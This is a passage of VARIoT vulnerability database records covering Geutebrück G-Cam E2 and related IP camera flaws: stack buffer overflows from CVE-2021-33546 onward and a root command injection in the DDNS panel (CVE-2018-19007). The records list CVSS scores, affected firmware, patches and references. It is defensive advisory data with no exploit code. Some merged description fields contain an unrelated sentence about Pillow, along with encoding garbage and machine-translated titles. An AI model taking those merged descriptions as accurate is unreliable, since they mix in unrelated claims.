          {
            "db": "NVD",
            "id": "CVE-2021-33546"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33546"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to a stack-based buffer overflow condition in the name parameter, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33546"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33546"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33546",
            "trust": 2.6
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-03",
            "trust": 1.7
          },
          {
            "db": "JVN",
            "id": "JVNVU97817785",
            "trust": 0.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-05",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023",
            "trust": 0.8
          },
          {
            "db": "CS-HELP",
            "id": "SB2021041363",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021072807",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.2550",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2091",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33546",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33546"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2091"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33546"
          }
        ]
      },
      "id": "VAR-202109-0599",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ],
        "trust": 0.01
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ]
      },
      "last_update_date": "2025-01-30T19:58:42.398000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
            "trust": 0.8,
            "url": "https://portal.geutebrueck.com/"
          },
          {
            "title": "Geutebr\u00fcck G-Cam E2  and  G-Code Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=158071"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2091"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-121",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33546"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.3,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 1.7,
            "url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu97817785/"
          },
          {
            "trust": 0.8,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
          },
          {
            "trust": 0.6,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33546"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/121.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33546"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2091"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33546"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33546"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2091"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33546"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-09-13T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-33546"
          },
          {
            "date": "2021-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-07-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2091"
          },
          {
            "date": "2021-09-13T18:15:22.290000",
            "db": "NVD",
            "id": "CVE-2021-33546"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-09-27T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-33546"
          },
          {
            "date": "2021-07-29T08:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-09-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2091"
          },
          {
            "date": "2023-11-07T03:35:51.630000",
            "db": "NVD",
            "id": "CVE-2021-33546"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2091"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201812-0470

    Vulnerability from variot - Updated: 2025-01-30 19:51

    In Geutebrueck GmbH E2 Camera Series versions prior to 1.12.0.25 the DDNS configuration (in the Network Configuration panel) is vulnerable to an OS system command injection as root. The Geutebr\303\274ck E2CameraSeries is an E2 series webcam from Geutebr\303\274ck, Germany. A remote attacker can exploit this vulnerability to inject operating system commands with root privileges. Geutebrück GmbH E2 Series IP Cameras are prone to an OS command-injection vulnerability

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201812-0470",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-cam\\/efd-2251",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam\\/ewpc-2275",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/efd-2251",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ewpc-2275",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "e2 camera series",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "e2 series camera",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebr\u00fcck",
            "version": "1.12"
          },
          {
            "model": "e2 series camera",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebr\u00fcck",
            "version": "1.12.0.25"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-04134"
          },
          {
            "db": "BID",
            "id": "106208"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-014624"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-19007"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-cam%2fefd-2251_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-cam%2fewpc-2275_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-014624"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The vendor reported this issue.",
        "sources": [
          {
            "db": "BID",
            "id": "106208"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2018-19007",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2018-19007",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "MULTIPLE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 8.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 6.4,
                "id": "CNVD-2019-04134",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:M/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2018-19007",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-19007",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-19007",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2019-04134",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201812-657",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULMON",
                "id": "CVE-2018-19007",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-04134"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-19007"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-014624"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201812-657"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-19007"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "In Geutebrueck GmbH E2 Camera Series versions prior to 1.12.0.25 the DDNS configuration (in the Network Configuration panel) is vulnerable to an OS system command injection as root. The Geutebr\\303\\274ck E2CameraSeries is an E2 series webcam from Geutebr\\303\\274ck, Germany. A remote attacker can exploit this vulnerability to inject operating system commands with root privileges. Geutebr\u00c3\u00bcck GmbH E2 Series IP Cameras are prone to an OS command-injection vulnerability",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-19007"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-014624"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-04134"
          },
          {
            "db": "BID",
            "id": "106208"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-19007"
          }
        ],
        "trust": 2.52
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-19007",
            "trust": 3.5
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-18-347-03",
            "trust": 2.8
          },
          {
            "db": "BID",
            "id": "106208",
            "trust": 2.6
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-014624",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-04134",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201812-657",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-19007",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-04134"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-19007"
          },
          {
            "db": "BID",
            "id": "106208"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-014624"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201812-657"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-19007"
          }
        ]
      },
      "id": "VAR-201812-0470",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-04134"
          }
        ],
        "trust": 1.7
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          },
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-04134"
          }
        ]
      },
      "last_update_date": "2025-01-30T19:51:02.593000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.guardzilla.com/"
          },
          {
            "title": "Geutebr\\303\\274ckE2CameraSeries operating system command injection vulnerability patch",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/153491"
          },
          {
            "title": "Geutebr\u00fcck E2 Camera Series Fixes for operating system command injection vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=87899"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-04134"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-014624"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201812-657"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-014624"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-19007"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.9,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-347-03"
          },
          {
            "trust": 2.4,
            "url": "http://www.securityfocus.com/bid/106208"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-19007"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-19007"
          },
          {
            "trust": 0.3,
            "url": "https://www.geutebrueck.com/"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/78.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-04134"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-19007"
          },
          {
            "db": "BID",
            "id": "106208"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-014624"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201812-657"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-19007"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-04134"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-19007"
          },
          {
            "db": "BID",
            "id": "106208"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-014624"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201812-657"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-19007"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-02-14T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-04134"
          },
          {
            "date": "2018-12-14T00:00:00",
            "db": "VULMON",
            "id": "CVE-2018-19007"
          },
          {
            "date": "2018-12-14T00:00:00",
            "db": "BID",
            "id": "106208"
          },
          {
            "date": "2019-03-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-014624"
          },
          {
            "date": "2018-12-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201812-657"
          },
          {
            "date": "2018-12-14T20:29:00.297000",
            "db": "NVD",
            "id": "CVE-2018-19007"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-02-14T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-04134"
          },
          {
            "date": "2019-10-09T00:00:00",
            "db": "VULMON",
            "id": "CVE-2018-19007"
          },
          {
            "date": "2018-12-14T00:00:00",
            "db": "BID",
            "id": "106208"
          },
          {
            "date": "2019-03-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-014624"
          },
          {
            "date": "2019-10-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201812-657"
          },
          {
            "date": "2024-11-21T03:57:09.213000",
            "db": "NVD",
            "id": "CVE-2018-19007"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201812-657"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Geutebrueck GmbH E2 Camera In the series  OS Command injection vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-014624"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201812-657"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202109-0598

    Vulnerability from variot - Updated: 2025-01-30 19:32

    Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to a stack-based buffer overflow condition in the counter parameter which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
